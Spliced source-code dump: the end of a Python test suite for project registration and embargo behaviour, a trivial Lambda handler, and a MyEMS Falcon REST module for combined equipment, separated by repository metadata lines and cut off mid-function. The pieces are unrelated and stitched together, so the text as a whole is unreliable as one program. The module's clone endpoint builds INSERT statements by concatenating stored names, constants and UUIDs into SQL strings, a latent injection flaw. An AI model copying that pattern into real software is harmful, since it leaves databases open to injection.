subproject = ProjectFactory(
creator=self.user,
parent=self.project,
title='Subproject'
)
subproject_component = NodeFactory(
creator=self.user,
parent=subproject,
title='Subcomponent'
)
res = self.app.post(
self.project.api_url_for('node_register_template_page_post', template=u'Open-Ended_Registration'),
self.valid_make_public_payload,
content_type='application/json',
auth=self.user.auth
)
self.project.reload()
# Last node directly registered from self.project
registration = Node.load(self.project.node__registrations[-1])
assert_true(registration.is_public)
for node in registration.get_descendants_recursive():
assert_true(node.is_registration)
assert_true(node.is_public)
@mock.patch('framework.tasks.handlers.enqueue_task')
def test_POST_register_embargo_is_not_public(self, mock_enqueue):
res = self.app.post(
self.project.api_url_for('node_register_template_page_post', template=u'Open-Ended_Registration'),
self.valid_embargo_payload,
content_type='application/json',
auth=self.user.auth
)
assert_equal(res.status_code, 201)
registration = Node.find().sort('-registered_date')[0]
assert_true(registration.is_registration)
assert_false(registration.is_public)
assert_true(registration.pending_registration)
assert_is_not_none(registration.embargo)
@mock.patch('framework.tasks.handlers.enqueue_task')
def test_POST_invalid_embargo_end_date_returns_HTTPBad_Request(self, mock_enqueue):
res = self.app.post(
self.project.api_url_for('node_register_template_page_post', template=u'Open-Ended_Registration'),
self.invalid_embargo_date_payload,
content_type='application/json',
auth=self.user.auth,
expect_errors=True
)
assert_equal(res.status_code, 400)
@mock.patch('framework.tasks.handlers.enqueue_task')
def test_valid_POST_embargo_adds_to_parent_projects_log(self, mock_enquque):
initial_project_logs = len(self.project.logs)
res = self.app.post(
self.project.api_url_for('node_register_template_page_post', template=u'Open-Ended_Registration'),
self.valid_embargo_payload,
content_type='application/json',
auth=self.user.auth
)
self.project.reload()
# Logs: Created, registered, embargo initiated
assert_equal(len(self.project.logs), initial_project_logs + 1)
| 1.984375 | 2 |
tests/Firefly.PSCloudFormation.Tests.Unit/Resources/LambdaDependencies/PythonLambda/Lambda/my_lambda.py | fireflycons/PSCloudFormation | 3 | 12759582 | <reponame>fireflycons/PSCloudFormation<gh_stars>1-10
def handler(event: dict, context, debug_var=1, **kwargs) -> None:
print('hi')
| 1.429688 | 1 |
myems-api/core/combinedequipment.py | FanZhen2002/myems | 2 | 12759583 | import falcon
import simplejson as json
import mysql.connector
import config
import uuid
from core.useractivity import user_logger, access_control
class CombinedEquipmentCollection:
@staticmethod
def __init__():
""" Initializes CombinedEquipmentCollection"""
pass
@staticmethod
def on_options(req, resp):
resp.status = falcon.HTTP_200
@staticmethod
def on_get(req, resp):
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor(dictionary=True)
query = (" SELECT id, name, uuid "
" FROM tbl_cost_centers ")
cursor.execute(query)
rows_cost_centers = cursor.fetchall()
cost_center_dict = dict()
if rows_cost_centers is not None and len(rows_cost_centers) > 0:
for row in rows_cost_centers:
cost_center_dict[row['id']] = {"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, uuid, "
" is_input_counted, is_output_counted, "
" cost_center_id, description "
" FROM tbl_combined_equipments "
" ORDER BY id ")
cursor.execute(query)
rows_combined_equipments = cursor.fetchall()
result = list()
if rows_combined_equipments is not None and len(rows_combined_equipments) > 0:
for row in rows_combined_equipments:
cost_center = cost_center_dict.get(row['cost_center_id'], None)
meta_result = {"id": row['id'],
"name": row['name'],
"uuid": row['uuid'],
"is_input_counted": bool(row['is_input_counted']),
"is_output_counted": bool(row['is_output_counted']),
"cost_center": cost_center,
"description": row['description'],
"qrcode": 'combinedequipment:' + row['uuid']}
result.append(meta_result)
cursor.close()
cnx.disconnect()
resp.text = json.dumps(result)
@staticmethod
@user_logger
def on_post(req, resp):
"""Handles POST requests"""
access_control(req)
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
raise falcon.HTTPError(falcon.HTTP_400, title='API.ERROR', description=ex)
new_values = json.loads(raw_json)
if 'name' not in new_values['data'].keys() or \
not isinstance(new_values['data']['name'], str) or \
len(str.strip(new_values['data']['name'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_NAME')
name = str.strip(new_values['data']['name'])
if 'is_input_counted' not in new_values['data'].keys() or \
not isinstance(new_values['data']['is_input_counted'], bool):
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_IS_INPUT_COUNTED_VALUE')
is_input_counted = new_values['data']['is_input_counted']
if 'is_output_counted' not in new_values['data'].keys() or \
not isinstance(new_values['data']['is_output_counted'], bool):
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_IS_OUTPUT_COUNTED_VALUE')
is_output_counted = new_values['data']['is_output_counted']
if 'cost_center_id' not in new_values['data'].keys() or \
not isinstance(new_values['data']['cost_center_id'], int) or \
new_values['data']['cost_center_id'] <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COST_CENTER_ID')
cost_center_id = new_values['data']['cost_center_id']
if 'description' in new_values['data'].keys() and \
new_values['data']['description'] is not None and \
len(str(new_values['data']['description'])) > 0:
description = str.strip(new_values['data']['description'])
else:
description = None
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE name = %s ", (name,))
if cursor.fetchone() is not None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.BAD_REQUEST',
description='API.COMBINED_EQUIPMENT_NAME_IS_ALREADY_IN_USE')
if cost_center_id is not None:
cursor.execute(" SELECT name "
" FROM tbl_cost_centers "
" WHERE id = %s ",
(new_values['data']['cost_center_id'],))
row = cursor.fetchone()
if row is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COST_CENTER_NOT_FOUND')
add_values = (" INSERT INTO tbl_combined_equipments "
" (name, uuid, is_input_counted, is_output_counted, "
" cost_center_id, description) "
" VALUES (%s, %s, %s, %s, %s, %s) ")
cursor.execute(add_values, (name,
str(uuid.uuid4()),
is_input_counted,
is_output_counted,
cost_center_id,
description))
new_id = cursor.lastrowid
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_201
resp.location = '/combinedequipments/' + str(new_id)
class CombinedEquipmentItem:
@staticmethod
def __init__():
"""Initializes CombinedEquipmentItem"""
pass
@staticmethod
def on_options(req, resp, id_):
resp.status = falcon.HTTP_200
@staticmethod
def on_get(req, resp, id_):
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor(dictionary=True)
query = (" SELECT id, name, uuid "
" FROM tbl_cost_centers ")
cursor.execute(query)
rows_cost_centers = cursor.fetchall()
cost_center_dict = dict()
if rows_cost_centers is not None and len(rows_cost_centers) > 0:
for row in rows_cost_centers:
cost_center_dict[row['id']] = {"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, uuid, "
" is_input_counted, is_output_counted, "
" cost_center_id, description "
" FROM tbl_combined_equipments "
" WHERE id = %s ")
cursor.execute(query, (id_,))
row = cursor.fetchone()
cursor.close()
cnx.disconnect()
if row is None:
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
else:
cost_center = cost_center_dict.get(row['cost_center_id'], None)
meta_result = {"id": row['id'],
"name": row['name'],
"uuid": row['uuid'],
"is_input_counted": bool(row['is_input_counted']),
"is_output_counted": bool(row['is_output_counted']),
"cost_center": cost_center,
"description": row['description'],
"qrcode": 'combinedequipment:' + row['uuid']}
resp.text = json.dumps(meta_result)
@staticmethod
@user_logger
def on_delete(req, resp, id_):
access_control(req)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
# check relation with space
cursor.execute(" SELECT space_id "
" FROM tbl_spaces_combined_equipments "
" WHERE combined_equipment_id = %s ",
(id_,))
rows_combined_equipments = cursor.fetchall()
if rows_combined_equipments is not None and len(rows_combined_equipments) > 0:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400,
title='API.BAD_REQUEST',
description='API.THERE_IS_RELATION_WITH_SPACES')
# check relation with meter
cursor.execute(" SELECT meter_id "
" FROM tbl_combined_equipments_meters "
" WHERE combined_equipment_id = %s ",
(id_,))
rows_meters = cursor.fetchall()
if rows_meters is not None and len(rows_meters) > 0:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400,
title='API.BAD_REQUEST',
description='API.THERE_IS_RELATION_WITH_METER')
# check relation with offline meter
cursor.execute(" SELECT offline_meter_id "
" FROM tbl_combined_equipments_offline_meters "
" WHERE combined_equipment_id = %s ",
(id_,))
rows_offline_meters = cursor.fetchall()
if rows_offline_meters is not None and len(rows_offline_meters) > 0:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400,
title='API.BAD_REQUEST',
description='API.THERE_IS_RELATION_WITH_OFFLINE_METER')
# check relation with virtual meter
cursor.execute(" SELECT virtual_meter_id "
" FROM tbl_combined_equipments_virtual_meters "
" WHERE combined_equipment_id = %s ",
(id_,))
rows_virtual_meters = cursor.fetchall()
if rows_virtual_meters is not None and len(rows_virtual_meters) > 0:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400,
title='API.BAD_REQUEST',
description='API.THERE_IS_RELATION_WITH_VIRTUAL_METER')
# delete all associated parameters
cursor.execute(" DELETE FROM tbl_combined_equipments_parameters WHERE combined_equipment_id = %s ", (id_,))
cnx.commit()
cursor.execute(" DELETE FROM tbl_combined_equipments WHERE id = %s ", (id_,))
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_204
@staticmethod
@user_logger
def on_put(req, resp, id_):
"""Handles PUT requests"""
access_control(req)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
raise falcon.HTTPError(falcon.HTTP_400, title='API.EXCEPTION', description=ex)
new_values = json.loads(raw_json)
if 'name' not in new_values['data'].keys() or \
not isinstance(new_values['data']['name'], str) or \
len(str.strip(new_values['data']['name'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_NAME')
name = str.strip(new_values['data']['name'])
if 'is_input_counted' not in new_values['data'].keys() or \
not isinstance(new_values['data']['is_input_counted'], bool):
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_IS_INPUT_COUNTED_VALUE')
is_input_counted = new_values['data']['is_input_counted']
if 'is_output_counted' not in new_values['data'].keys() or \
not isinstance(new_values['data']['is_output_counted'], bool):
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_IS_OUTPUT_COUNTED_VALUE')
is_output_counted = new_values['data']['is_output_counted']
if 'cost_center_id' not in new_values['data'].keys() or \
not isinstance(new_values['data']['cost_center_id'], int) or \
new_values['data']['cost_center_id'] <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COST_CENTER_ID')
cost_center_id = new_values['data']['cost_center_id']
if 'description' in new_values['data'].keys() and \
new_values['data']['description'] is not None and \
len(str(new_values['data']['description'])) > 0:
description = str.strip(new_values['data']['description'])
else:
description = None
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE name = %s AND id != %s ", (name, id_))
if cursor.fetchone() is not None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.BAD_REQUEST',
description='API.COMBINED_EQUIPMENT_NAME_IS_ALREADY_IN_USE')
cursor.execute(" SELECT name "
" FROM tbl_cost_centers "
" WHERE id = %s ",
(new_values['data']['cost_center_id'],))
row = cursor.fetchone()
if row is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COST_CENTER_NOT_FOUND')
update_row = (" UPDATE tbl_combined_equipments "
" SET name = %s, is_input_counted = %s, is_output_counted = %s, "
" cost_center_id = %s, description = %s "
" WHERE id = %s ")
cursor.execute(update_row, (name,
is_input_counted,
is_output_counted,
cost_center_id,
description,
id_))
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_200
# Clone a Combined Equipment
@staticmethod
@user_logger
def on_post(req, resp, id_):
"""Handles PUT requests"""
access_control(req)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
raise falcon.HTTPError(falcon.HTTP_400, title='API.EXCEPTION', description=ex)
new_values = json.loads(raw_json)
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor(dictionary=True)
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
query = (" SELECT name, is_input_counted, is_output_counted, "
" cost_center_id, description "
" FROM tbl_combined_equipments "
" WHERE id = %s ")
cursor.execute(query, (id_,))
row = cursor.fetchone()
if row is None:
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
else:
add_values = (" INSERT INTO tbl_combined_equipments "
" (name, uuid, is_input_counted, is_output_counted, "
" cost_center_id, description) "
" VALUES (%s, %s, %s, %s, %s, %s) ")
cursor.execute(add_values, (row['name'] + ' Copy',
str(uuid.uuid4()),
row['is_input_counted'],
row['is_output_counted'],
row['cost_center_id'],
row['description']))
new_id = cursor.lastrowid
cnx.commit()
# clone relation with meter
cursor.execute(" SELECT meter_id, is_output "
" FROM tbl_combined_equipments_meters "
" WHERE combined_equipment_id = %s ",
(id_,))
rows_meters = cursor.fetchall()
if rows_meters is not None and len(rows_meters) > 0:
add_values = (" INSERT INTO tbl_combined_equipments_meters (combined_equipment_id, meter_id, is_output) "
" VALUES ")
for row in rows_meters:
add_values += " (" + str(new_id) + ","
add_values += str(row['meter_id']) + ","
add_values += str(bool(row['is_output'])) + "), "
# trim ", " at the end of string and then execute
cursor.execute(add_values[:-2])
cnx.commit()
# clone relation with offline meter
cursor.execute(" SELECT offline_meter_id, is_output "
" FROM tbl_combined_equipments_offline_meters "
" WHERE combined_equipment_id = %s ",
(id_,))
rows_offline_meters = cursor.fetchall()
if rows_offline_meters is not None and len(rows_offline_meters) > 0:
add_values = (" INSERT INTO tbl_combined_equipments_offline_meters "
" (combined_equipment_id, offline_meter_id, is_output) "
" VALUES ")
for row in rows_offline_meters:
add_values += " (" + str(new_id) + ","
add_values += "'" + str(row['offline_meter_id']) + "',"
add_values += str(bool(row['is_output'])) + "), "
# trim ", " at the end of string and then execute
cursor.execute(add_values[:-2])
cnx.commit()
# clone relation with virtual meter
cursor.execute(" SELECT virtual_meter_id, is_output "
" FROM tbl_combined_equipments_virtual_meters "
" WHERE combined_equipment_id = %s ",
(id_,))
rows_virtual_meters = cursor.fetchall()
if rows_virtual_meters is not None and len(rows_virtual_meters) > 0:
add_values = (" INSERT INTO tbl_combined_equipments_virtual_meters "
" (combined_equipment_id, virtual_meter_id, is_output) "
" VALUES ")
for row in rows_virtual_meters:
add_values += " (" + str(new_id) + ","
add_values += str(row['virtual_meter_id']) + ","
add_values += str(bool(row['is_output'])) + "), "
# trim ", " at the end of string and then execute
cursor.execute(add_values[:-2])
cnx.commit()
# clone parameters
cursor.execute(" SELECT name, parameter_type, constant, point_id, numerator_meter_uuid, denominator_meter_uuid "
" FROM tbl_combined_equipments_parameters "
" WHERE combined_equipment_id = %s ",
(id_,))
rows_parameters = cursor.fetchall()
if rows_parameters is not None and len(rows_parameters) > 0:
add_values = (" INSERT INTO tbl_combined_equipments_parameters"
" (combined_equipment_id, name, parameter_type, constant, point_id, "
" numerator_meter_uuid, denominator_meter_uuid) "
" VALUES ")
for row in rows_parameters:
add_values += " (" + str(new_id) + ","
add_values += "'" + str(row['name']) + "',"
add_values += "'" + str(row['parameter_type']) + "',"
if row['constant'] is not None:
add_values += "'" + str(row['constant']) + "',"
else:
add_values += "null, "
if row['point_id'] is not None:
add_values += str(row['point_id']) + ","
else:
add_values += "null, "
if row['numerator_meter_uuid'] is not None:
add_values += "'" + row['numerator_meter_uuid'] + "',"
else:
add_values += "null, "
if row['denominator_meter_uuid'] is not None:
add_values += "'" + row['denominator_meter_uuid'] + "'), "
else:
add_values += "null), "
# trim ", " at the end of string and then execute
cursor.execute(add_values[:-2])
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_201
resp.location = '/combinedequipments/' + str(new_id)
class CombinedEquipmentEquipmentCollection:
@staticmethod
def __init__():
"""Initializes CombinedEquipmentEquipmentCollection"""
pass
@staticmethod
def on_options(req, resp, id_):
resp.status = falcon.HTTP_200
@staticmethod
def on_get(req, resp, id_):
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
query = (" SELECT e.id, e.name, e.uuid "
" FROM tbl_combined_equipments c, tbl_combined_equipments_equipments ce, tbl_equipments e "
" WHERE ce.combined_equipment_id = c.id AND e.id = ce.equipment_id AND c.id = %s "
" ORDER BY e.id ")
cursor.execute(query, (id_,))
rows = cursor.fetchall()
result = list()
if rows is not None and len(rows) > 0:
for row in rows:
meta_result = {"id": row[0], "name": row[1], "uuid": row[2]}
result.append(meta_result)
resp.text = json.dumps(result)
@staticmethod
@user_logger
def on_post(req, resp, id_):
"""Handles POST requests"""
access_control(req)
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
raise falcon.HTTPError(falcon.HTTP_400, title='API.EXCEPTION', description=ex)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
new_values = json.loads(raw_json)
if 'equipment_id' not in new_values['data'].keys() or \
not isinstance(new_values['data']['equipment_id'], int) or \
new_values['data']['equipment_id'] <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_EQUIPMENT_ID')
equipment_id = new_values['data']['equipment_id']
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" from tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_equipments "
" WHERE id = %s ", (equipment_id,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.EQUIPMENT_NOT_FOUND')
query = (" SELECT id "
" FROM tbl_combined_equipments_equipments "
" WHERE combined_equipment_id = %s AND equipment_id = %s")
cursor.execute(query, (id_, equipment_id,))
if cursor.fetchone() is not None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.ERROR',
description='API.COMBINED_EQUIPMENT_EQUIPMENT_RELATION_EXISTS')
add_row = (" INSERT INTO tbl_combined_equipments_equipments (combined_equipment_id, equipment_id) "
" VALUES (%s, %s) ")
cursor.execute(add_row, (id_, equipment_id,))
new_id = cursor.lastrowid
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_201
resp.location = '/combinedequipments/' + str(id_) + '/equipments/' + str(equipment_id)
class CombinedEquipmentEquipmentItem:
@staticmethod
def __init__():
"""Initializes CombinedEquipmentEquipmentItem"""
pass
@staticmethod
def on_options(req, resp, id_, eid):
resp.status = falcon.HTTP_200
@staticmethod
@user_logger
def on_delete(req, resp, id_, eid):
access_control(req)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
if not eid.isdigit() or int(eid) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_EQUIPMENT_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_equipments "
" WHERE id = %s ", (eid,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT id "
" FROM tbl_combined_equipments_equipments "
" WHERE combined_equipment_id = %s AND equipment_id = %s ", (id_, eid))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_EQUIPMENT_RELATION_NOT_FOUND')
cursor.execute(" DELETE FROM tbl_combined_equipments_equipments "
" WHERE combined_equipment_id = %s AND equipment_id = %s ", (id_, eid))
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_204
class CombinedEquipmentParameterCollection:
@staticmethod
def __init__():
"""Initializes CombinedEquipmentParameterCollection"""
pass
@staticmethod
def on_options(req, resp, id_):
resp.status = falcon.HTTP_200
@staticmethod
def on_get(req, resp, id_):
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor(dictionary=True)
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
query = (" SELECT id, name "
" FROM tbl_points ")
cursor.execute(query)
rows_points = cursor.fetchall()
point_dict = dict()
if rows_points is not None and len(rows_points) > 0:
for row in rows_points:
point_dict[row['id']] = {"id": row['id'],
"name": row['name']}
query = (" SELECT id, name, uuid "
" FROM tbl_meters ")
cursor.execute(query)
rows_meters = cursor.fetchall()
meter_dict = dict()
if rows_meters is not None and len(rows_meters) > 0:
for row in rows_meters:
meter_dict[row['uuid']] = {"type": 'meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, uuid "
" FROM tbl_offline_meters ")
cursor.execute(query)
rows_offline_meters = cursor.fetchall()
offline_meter_dict = dict()
if rows_offline_meters is not None and len(rows_offline_meters) > 0:
for row in rows_offline_meters:
offline_meter_dict[row['uuid']] = {"type": 'offline_meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, uuid "
" FROM tbl_virtual_meters ")
cursor.execute(query)
rows_virtual_meters = cursor.fetchall()
virtual_meter_dict = dict()
if rows_virtual_meters is not None and len(rows_virtual_meters) > 0:
for row in rows_virtual_meters:
virtual_meter_dict[row['uuid']] = {"type": 'virtual_meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, parameter_type, "
" constant, point_id, numerator_meter_uuid, denominator_meter_uuid "
" FROM tbl_combined_equipments_parameters "
" WHERE combined_equipment_id = %s "
" ORDER BY id ")
cursor.execute(query, (id_, ))
rows_parameters = cursor.fetchall()
result = list()
if rows_parameters is not None and len(rows_parameters) > 0:
for row in rows_parameters:
constant = None
point = None
numerator_meter = None
denominator_meter = None
if row['parameter_type'] == 'point':
point = point_dict.get(row['point_id'], None)
constant = None
numerator_meter = None
denominator_meter = None
elif row['parameter_type'] == 'constant':
constant = row['constant']
point = None
numerator_meter = None
denominator_meter = None
elif row['parameter_type'] == 'fraction':
constant = None
point = None
# find numerator meter by uuid
numerator_meter = meter_dict.get(row['numerator_meter_uuid'], None)
if numerator_meter is None:
numerator_meter = virtual_meter_dict.get(row['numerator_meter_uuid'], None)
if numerator_meter is None:
numerator_meter = offline_meter_dict.get(row['numerator_meter_uuid'], None)
# find denominator meter by uuid
denominator_meter = meter_dict.get(row['denominator_meter_uuid'], None)
if denominator_meter is None:
denominator_meter = virtual_meter_dict.get(row['denominator_meter_uuid'], None)
if denominator_meter is None:
denominator_meter = offline_meter_dict.get(row['denominator_meter_uuid'], None)
meta_result = {"id": row['id'],
"name": row['name'],
"parameter_type": row['parameter_type'],
"constant": constant,
"point": point,
"numerator_meter": numerator_meter,
"denominator_meter": denominator_meter}
result.append(meta_result)
cursor.close()
cnx.disconnect()
resp.text = json.dumps(result)
@staticmethod
@user_logger
def on_post(req, resp, id_):
"""Handles POST requests"""
access_control(req)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
raise falcon.HTTPError(falcon.HTTP_400, title='API.ERROR', description=ex)
new_values = json.loads(raw_json)
if 'name' not in new_values['data'].keys() or \
not isinstance(new_values['data']['name'], str) or \
len(str.strip(new_values['data']['name'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_PARAMETER_NAME')
name = str.strip(new_values['data']['name'])
if 'parameter_type' not in new_values['data'].keys() or \
not isinstance(new_values['data']['parameter_type'], str) or \
len(str.strip(new_values['data']['parameter_type'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_PARAMETER_TYPE')
parameter_type = str.strip(new_values['data']['parameter_type'])
if parameter_type not in ('constant', 'point', 'fraction'):
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_PARAMETER_TYPE')
constant = None
if 'constant' in new_values['data'].keys():
if new_values['data']['constant'] is not None and \
isinstance(new_values['data']['constant'], str) and \
len(str.strip(new_values['data']['constant'])) > 0:
constant = str.strip(new_values['data']['constant'])
point_id = None
if 'point_id' in new_values['data'].keys():
if new_values['data']['point_id'] is not None and \
new_values['data']['point_id'] <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_POINT_ID')
point_id = new_values['data']['point_id']
numerator_meter_uuid = None
if 'numerator_meter_uuid' in new_values['data'].keys():
if new_values['data']['numerator_meter_uuid'] is not None and \
isinstance(new_values['data']['numerator_meter_uuid'], str) and \
len(str.strip(new_values['data']['numerator_meter_uuid'])) > 0:
numerator_meter_uuid = str.strip(new_values['data']['numerator_meter_uuid'])
denominator_meter_uuid = None
if 'denominator_meter_uuid' in new_values['data'].keys():
if new_values['data']['denominator_meter_uuid'] is not None and \
isinstance(new_values['data']['denominator_meter_uuid'], str) and \
len(str.strip(new_values['data']['denominator_meter_uuid'])) > 0:
denominator_meter_uuid = str.strip(new_values['data']['denominator_meter_uuid'])
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor(dictionary=True)
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments_parameters "
" WHERE name = %s AND combined_equipment_id = %s ", (name, id_))
if cursor.fetchone() is not None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.COMBINED_EQUIPMENT_PARAMETER_NAME_IS_ALREADY_IN_USE')
# validate by parameter type
if parameter_type == 'point':
if point_id is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_POINT_ID')
query = (" SELECT id, name "
" FROM tbl_points "
